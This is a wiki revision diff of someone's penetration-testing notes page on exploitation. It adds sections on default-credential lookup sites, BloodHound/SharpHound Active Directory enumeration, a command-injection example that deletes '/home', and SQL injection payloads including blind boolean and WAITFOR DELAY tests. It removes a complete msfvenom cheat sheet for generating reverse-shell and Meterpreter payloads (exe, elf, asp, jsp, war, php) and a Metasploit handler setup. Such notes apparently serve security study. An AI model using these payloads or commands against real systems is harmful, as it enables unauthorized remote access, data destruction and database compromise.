Differences

This shows you the differences between two versions of the page.

--- method_4_exploitation [2022/12/31 00:31] – [Overview] gman
+++ method_4_exploitation [2023/01/12 00:27] (current) – [Defaults] gman
@@ Line 49: / Line 49: @@
 ----
+====== Defaults ======
+Many folks leave many devices with factory defaults. You can quickly look up the default login creds here:
+  * https://www.defaultpassword.com/
+  * https://default-password.info/
+  * https://cirt.net/passwords
+  * [[https://www.google.com/search?q=default+passwords | Or just Google "default passwords"]]. There are a ton of sites.
+----
 ====== Tools ======
+===== Bloodhound =====
+[[https://www.kali.org/tools/bloodhound/ | Bloodhound]] is a tool to //**visualize**// Active Directory (AD) objects and permissions.
+**NOTE:** Bloodhound cannot be used by itself. You need to feed this puppy...
+  * You have to aquire the AD info first using a tool like [[https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux | Sharphound]].
+    * You must be a domain member to run it.
+    * It will enumerate the AD domain.
+  * Then, you feed the Sharphound info into Bloodhound
+    - Analyze the results to build a target list.
+    - Build a list of Domain Admins.
 ===== curl =====
@@ Line 113: / Line 135: @@
 ----
-====== MetaSploit ======
+===== MetaSploit =====
-===== msfvenom =====
+See [[cheat_sheets_metasploit| here]].
+==== msfvenom ====
 See [[cheat_sheets_various#msfvenom | here]].
-----
-===== MSF Handler =====
-''msfconsole''...Handlers should be in the following format:
-<code>
-use exploit/multi/handler
-set PAYLOAD <Payload name>
-set LHOST <LHOST value>
-set LPORT <LPORT value>
-</code>
-----
-===== Non-Meterpreter Binaries =====
-**Staged Payloads for Windows**
-<code>
-# x86
-msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
-# x64
-msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
-</code>
-**Stageless Payloads for Windows**
-<code>
-# x86
-msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
-# x64
-msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
-</code>
-**Staged Payloads for Linux**
-<code>
-# x86
-msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
-# x64
-msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
-</code>
-**Stageless Payloads for Linux**
-<code>
-# x86
-msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
-# x64
-msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
-</code>
-===== Non-Meterpreter Web Payloads =====
-<code>
-# asp
-msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
-# jsp
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
-# war
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
-# php
-msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
-</code>
-===== Meterpreter Binaries =====
-**Staged Payloads for Windows**
-<code>
-# x86
-msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
-# x64
-msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
-</code>
-**Stageless Payloads for Windows**
-<code>
-# x86
-msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
-# x64
-msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
-</code>
-**Staged Payloads for Linux**
-<code>
-# x86
-msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
-# x64
-msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
-</code>
-**Stageless Payloads for Linux**
-<code>
-# x86
-msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
-# x64
-msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
-</code>
-===== Meterpreter Web Payloads =====
-<code>
-# asp
-msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
-# jsp
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp
-# war
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war
-# php
-msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
-</code>
 ----
@@ Line 306: / Line 198: @@
   * It works with a variety of protocols.
   * It's a bit more difficult to use. The author says it's "less script kiddie friendly."
+----
+====== Injection Attacks ======
+===== Command =====
+**Command Injection Attacks:** These are attacks that attempt to send commands through a web app to the operating system.
+  * It would give you the ability to directly manipulate the o/s.
+  * On Linux, use the ''system()'' call to send commands to the o/s itself.
+**Example:** If an app asks for a username to set up an account (assuming the username dbag)
+  * When we create our account with the username "dbag," the back-end result sent to the o/s would be something like:
+    * ''system('mkdir /home/dbag')''
+  * Using command injection, you add commands to our user input:
+    * ''dbag & rm -rf /home''
+  * This would result in a command like this:
+    * ''system('mkdir /home/dbag & rm -rf /home')''
+  * And that's bad.
+===== SQLi =====
+**SQL Injection:** One quick way to check to see if the server is vulnerable to SQL injections, type the following into the query box.
+<code>
+' or '1'='1
+</code>
+==== Tool: SQLMap ====
+Automates SQLi enumeration and exploitation. Use it only after you have manually verified there is indeed an SQLi vulnerability on the target.
+==== Blind SQLi ====
+Blind SQL injection takes two forms: boolean-based (T/F) and timing-based.
+**Boolean-Based Blind SQLi:** Uses a boolean (T/F) SQL injection statement to test if the injected code gets through.
+  - Test for a standard SQL injection vulnerability by placing a boolean TRUE after valid input.
+    * If it is vulnerable it will match ALL results.
+    * If it is not vulnerable, you will get a normal result (as if you did not send the ''1=1'')
+  - Further test the vulnerability by sending it a boolean FALSE.
+    * Since 1 never equals 2, this should never return results.
+    * If it returns results on your valid input, there is no vulnerability
+    * If it returns no results, then the injection worked.
+<code>
+# 1. TRUE test example. Your input into target web app:
+[valid input]' OR 1=1;--
+# 2. FALSE test example. Your input into target web app:
+[valid input]' AND 1=2;--
+</code>
+**Timing-Based Blind SQLi:** relies on the amount of time required to process a query.
+  * If the app returns on the query immediately, it's probably not vulnerable.
+  * If there is a delay/pause (based on your query statement) before the return, the injection worked.
+  * Example:
+<code>[valid input]'; WAITFOR DELAY '00:00:15';--</code>
+**Tools:** Metasploit & SQLMap.
+  * They automate these timing-based attacks, making them fairly easy.
 ----
@@ Line 333: / Line 288: @@
 https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/  (scroll down)
-----
-====== SQLi ======
-**SQL Injection:** One quick way to check to see if the server is vulnerable to SQL injections, type the following into the query box.
-<code>
-' or '1'='1
-</code>
-===== Tool: SQLMap =====
-Automates SQLi enumeration and exploitation. Use it only after you have manually verified there is indeed an SQLi vulnerability on the target.
 ----